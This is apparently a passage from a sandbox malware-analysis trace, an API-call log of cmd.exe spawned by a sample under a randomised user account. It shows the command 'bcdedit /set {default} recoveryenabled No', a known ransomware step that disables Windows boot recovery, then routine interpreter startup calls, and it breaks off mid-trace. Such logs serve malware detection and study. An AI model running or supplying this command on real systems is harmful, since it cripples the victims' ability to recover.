CloseServiceHandle (hSCObject=0x3cf680) returned 1 [0093.206] exit (_Code=1062) Thread: id = 153 os_tid = 0xd7c Process: id = "28" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3aefb000" os_pid = "0xb48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "cmd.exe /c bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 115 os_tid = 0xb60 [0094.151] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39fad4 | out: lpSystemTimeAsFileTime=0x39fad4*(dwLowDateTime=0x2602a200, dwHighDateTime=0x1d62227)) [0094.151] GetCurrentProcessId () returned 0xb48 [0094.151] GetCurrentThreadId () returned 0xb60 [0094.151] GetTickCount () returned 0x114e58f [0094.151] QueryPerformanceCounter (in: lpPerformanceCount=0x39facc | out: lpPerformanceCount=0x39facc*=21410668915) returned 1 [0094.153] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0094.153] __set_app_type (_Type=0x1) [0094.153] __p__fmode () returned 0x770331f4 [0094.153] __p__commode () returned 0x770331fc [0094.153] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0094.154] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0094.154] GetCurrentThreadId () returned 0xb60 [0094.154] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb60) returned 0x60 [0094.154] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0094.154] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0094.154] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.155] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.155] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39fa64 | out: phkResult=0x39fa64*=0x0) returned 0x2 [0094.156] VirtualQuery (in: lpAddress=0x39fa9b, lpBuffer=0x39fa34, dwLength=0x1c | out: lpBuffer=0x39fa34*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.156] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39fa34, dwLength=0x1c | out: lpBuffer=0x39fa34*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0094.156] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39fa34, dwLength=0x1c | out: lpBuffer=0x39fa34*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0094.156] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39fa34, dwLength=0x1c | out: lpBuffer=0x39fa34*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.156] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39fa34, dwLength=0x1c | out: lpBuffer=0x39fa34*(BaseAddress=0x3a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x150000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0094.156] GetConsoleOutputCP () returned 0x1b5 [0094.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0094.156] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0094.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.156] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0094.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.157] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0094.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.158] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.158] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0094.159] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.159] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0094.159] GetEnvironmentStringsW () returned 0x7d2030* [0094.159] GetProcessHeap () returned 0x7c0000 [0094.159] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xaca) returned 0x7d2b08 [0094.160] FreeEnvironmentStringsW (penv=0x7d2030) returned 1 [0094.160] GetProcessHeap () returned 0x7c0000 [0094.160] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4) returned 0x7d0c60 [0094.160] GetEnvironmentStringsW () returned 0x7d2030* [0094.160] GetProcessHeap () returned 0x7c0000 [0094.160] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xaca) returned 0x7d35e0 [0094.160] FreeEnvironmentStringsW (penv=0x7d2030) returned 1 [0094.160] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e9d4 | out: phkResult=0x39e9d4*=0x68) returned 0x0 [0094.160] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x0, lpData=0x39e9e0*=0x0, lpcbData=0x39e9d8*=0x1000) returned 0x2 [0094.161] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x4, lpData=0x39e9e0*=0x1, lpcbData=0x39e9d8*=0x4) returned 0x0 [0094.161] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x0, lpData=0x39e9e0*=0x1, lpcbData=0x39e9d8*=0x1000) returned 0x2 [0094.161] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x4, lpData=0x39e9e0*=0x0, lpcbData=0x39e9d8*=0x4) returned 0x0 [0094.161] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x4, lpData=0x39e9e0*=0x40, lpcbData=0x39e9d8*=0x4) returned 0x0 [0094.161] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x4, lpData=0x39e9e0*=0x40, lpcbData=0x39e9d8*=0x4) returned 0x0 [0094.161] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x0, lpData=0x39e9e0*=0x40, lpcbData=0x39e9d8*=0x1000) returned 0x2 [0094.161] RegCloseKey (hKey=0x68) returned 0x0 [0094.161] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e9d4 | out: phkResult=0x39e9d4*=0x68) returned 0x0 [0094.161] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x0, lpData=0x39e9e0*=0x40, lpcbData=0x39e9d8*=0x1000) returned 0x2 [0094.162] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x4, lpData=0x39e9e0*=0x1, lpcbData=0x39e9d8*=0x4) returned 0x0 [0094.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x0, lpData=0x39e9e0*=0x1, lpcbData=0x39e9d8*=0x1000) returned 0x2 [0094.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x4, lpData=0x39e9e0*=0x0, lpcbData=0x39e9d8*=0x4) returned 0x0 [0094.162] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x4, lpData=0x39e9e0*=0x9, lpcbData=0x39e9d8*=0x4) returned 0x0 [0094.162] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x4, lpData=0x39e9e0*=0x9, lpcbData=0x39e9d8*=0x4) returned 0x0 [0094.162] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e9dc, lpData=0x39e9e0, lpcbData=0x39e9d8*=0x1000 | out: lpType=0x39e9dc*=0x0, lpData=0x39e9e0*=0x9, lpcbData=0x39e9d8*=0x1000) returned 0x2 [0094.162] RegCloseKey (hKey=0x68) returned 0x0 [0094.162] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb03213 [0094.162] srand (_Seed=0x5eb03213) [0094.162] GetCommandLineW () returned="cmd.exe /c bcdedit /set {default} recoveryenabled No" [0094.162] GetCommandLineW () returned="cmd.exe /c bcdedit /set {default} recoveryenabled No" [0094.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0094.163] GetProcessHeap () returned 0x7c0000 [0094.163] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x210) returned 0x7d2030 [0094.163] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7d2038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0094.163] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.163] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.163] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.164] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0094.164] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0094.164] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0094.164] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0094.164] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0094.164] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0094.164] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0094.164] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0094.164] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0094.164] GetProcessHeap () returned 0x7c0000 [0094.164] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d2b08 | out: hHeap=0x7c0000) returned 1 [0094.164] GetEnvironmentStringsW () returned 0x7d2248* [0094.164] GetProcessHeap () returned 0x7c0000 [0094.164] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xae2) returned 0x7d4ba8 [0094.165] FreeEnvironmentStringsW (penv=0x7d2248) returned 1 [0094.165] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.165] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.165] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.165] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.165] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.165] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0094.165] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.165] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.165] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.165] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.165] GetProcessHeap () returned 0x7c0000 [0094.165] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x54) returned 0x7d5698 [0094.165] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39f7a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0094.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x39f7a0, lpFilePart=0x39f79c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39f79c*="Desktop") returned 0x25 [0094.165] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0094.166] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x39f51c | out: lpFindFileData=0x39f51c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x7d1eb0 [0094.166] FindClose (in: hFindFile=0x7d1eb0 | out: hFindFile=0x7d1eb0) returned 1 [0094.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x39f51c | out: lpFindFileData=0x39f51c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x7d1eb0 [0094.166] FindClose (in: hFindFile=0x7d1eb0 | out: hFindFile=0x7d1eb0) returned 1 [0094.166] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0094.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x39f51c | out: lpFindFileData=0x39f51c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1fdad3c0, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0x1fdad3c0, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x7d1eb0 [0094.166] FindClose (in: hFindFile=0x7d1eb0 | out: hFindFile=0x7d1eb0) returned 1 [0094.167] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0094.167] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0094.167] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0094.167] GetProcessHeap () returned 0x7c0000 [0094.167] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d4ba8 | out: hHeap=0x7c0000) returned 1 [0094.167] GetEnvironmentStringsW () returned 0x7d40b8* [0094.167] GetProcessHeap () returned 0x7c0000 [0094.167] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xb36) returned 0x7d5ef8 [0094.167] FreeEnvironmentStringsW (penv=0x7d40b8) returned 1 [0094.167] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0094.167] GetProcessHeap () returned 0x7c0000 [0094.167] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d5698 | out: hHeap=0x7c0000) returned 1 [0094.167] GetProcessHeap () returned 0x7c0000 [0094.167] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x400e) returned 0x7d6a38 [0094.168] GetProcessHeap () returned 0x7c0000 [0094.168] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x60) returned 0x7d2d88 [0094.168] GetProcessHeap () returned 0x7c0000 [0094.168] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d6a38 | out: hHeap=0x7c0000) returned 1 [0094.168] GetConsoleOutputCP () returned 0x1b5 [0094.169] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0094.169] GetUserDefaultLCID () returned 0x409 [0094.170] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0094.170] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39f8e0, cchData=128 | out: lpLCData="0") returned 2 [0094.170] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39f8e0, cchData=128 | out: lpLCData="0") returned 2 [0094.170] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39f8e0, cchData=128 | out: lpLCData="1") returned 2 [0094.170] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0094.170] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0094.171] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.173] GetProcessHeap () returned 0x7c0000 [0094.173] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x20c) returned 0x7d2df0 [0094.173] GetConsoleTitleW (in: lpConsoleTitle=0x7d2df0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.174] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0094.174] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0094.174] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0094.174] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0094.175] GetProcessHeap () returned 0x7c0000 [0094.175] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x400a) returned 0x7d6a38 [0094.175] GetProcessHeap () returned 0x7c0000 [0094.175] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d6a38 | out: hHeap=0x7c0000) returned 1 [0094.176] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0094.176] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0094.176] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0094.176] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0094.176] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0094.176] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0094.176] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0094.176] GetProcessHeap () returned 0x7c0000 [0094.176] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x58) returned 0x7d3008 [0094.176] GetProcessHeap () returned 0x7c0000 [0094.176] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x18) returned 0x7d3068 [0094.178] GetProcessHeap () returned 0x7c0000 [0094.178] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4e) returned 0x7d3088 [0094.179] GetConsoleTitleW (in: lpConsoleTitle=0x39f5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.180] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0094.180] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0094.180] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0094.180] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0094.180] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0094.180] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0094.180] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0094.181] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0094.181] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0094.181] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0094.181] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0094.181] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0094.181] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0094.181] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0094.181] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0094.181] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0094.181] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0094.181] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0094.181] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0094.181] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0094.181] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0094.181] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0094.181] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0094.181] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0094.181] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0094.181] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0094.182] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0094.182] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0094.182] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0094.182] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0094.182] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0094.182] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0094.182] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0094.182] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0094.182] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0094.182] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0094.182] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0094.182] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0094.182] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0094.182] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0094.182] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0094.182] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0094.183] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0094.183] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0094.183] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0094.183] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0094.183] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0094.183] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0094.183] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0094.183] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0094.183] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0094.183] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0094.183] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0094.183] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0094.183] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0094.183] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0094.183] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0094.183] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0094.183] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0094.183] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0094.184] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0094.184] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0094.184] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0094.184] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0094.184] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0094.184] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 